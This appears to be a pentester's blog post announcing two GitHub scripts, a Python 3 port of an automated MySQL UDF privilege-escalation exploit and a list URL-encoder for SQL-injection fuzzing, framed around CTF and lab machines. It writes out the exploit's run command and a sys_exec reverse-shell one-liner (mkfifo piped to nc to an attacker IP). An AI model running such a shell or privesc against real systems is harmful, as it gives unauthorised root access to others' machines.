I haven’t had as much time as I would have hoped to start on some other projects as I would have liked. But I have uploaded two new scripts to my GitHub (https://github.com/atthacks/).
udf_root_py3
https://github.com/atthacks/udf_root_py3
This is a really useful script but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x (https://twitter.com/d7x_real/) did a great job at automating this MySQL privilege escalation (https://www.exploit-db.com/exploits/1518).
As you can see there are usually a number of manual steps to complete this privesc. However, if you find yourself in a position where you can use this exploit then simply running this script and passing the MySQL username and password will automate the process.
python3 udf_root_py3.py --username root --password rootPasswordYou may or may not have success with the root shell it attempts to open for you. In my experience I had to exit the shell it entered me in and return to the mysql instance before using the following commands to execute commands as root.
select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 80 >/tmp/f');urlencode-list
https://github.com/atthacks/urlencode-list
What is this script?
This was a quick Python script I put together to URL encode / decode lists.
Why did I create it?
This can have a lot of uses not just in pentesting / CTF exercises. The reason I made this in particular was because I was in a situation where I could not use a tool such as sqlmap to detect sql injection and instead of manually testing everything off my sql injection cheatsheet I could automate it with a tool like wfuzz.
Where have I used it?
I recommend checking out bootlesshackers Insanity Hosting machine on Vulnhub for an example box of where this may be useful.
Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.
Now if you have the Community version of Burp, using Intruder like this can take a long time especially if you have a large list. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your input file for wfuzz.
Notes
Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.
Other ways of doing this?
There are lots of ways / scripts to do this and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire contents into a single line which doesn’t help you if you wanted to use it in an attack like mentioned above.
Anyway I hope someone finds these scripts useful.
🙂